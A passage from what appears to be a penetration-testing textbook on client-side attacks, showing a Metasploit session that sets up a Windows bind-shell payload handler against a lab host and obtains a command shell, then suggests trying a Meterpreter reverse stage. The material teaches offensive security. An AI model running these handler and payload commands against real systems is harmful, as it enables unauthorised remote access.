background image

Exploitation Using Client-Side Attacks

115

Figure 8-2: The last part of our instruction set that we need

msf > 

use multi/handler

msf exploit(handler) > 

set payload windows/shell/bind_tcp

payload => windows/shell/bind_tcp
msf exploit(handler) > 

set LPORT 443

LPORT => 443
msf exploit(handler) > 

set RHOST 192.168.33.130

RHOST => 192.168.33.130
msf exploit(handler) > 

exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.33.129:60463 -> 192.168.33.130:443)

You have reached a basic command shell! As a good practicing technique, 

try a stage 1 Meterpreter reverse and see if you can get a connection. When 
you are finished, simply close the Immunity Debugger window and you’re all 
done. It’s important that you get familiar with Immunity Debugger now, 
because we will be leveraging it in later chapters. Now let’s launch our first 
browser exploit that uses a heap spray.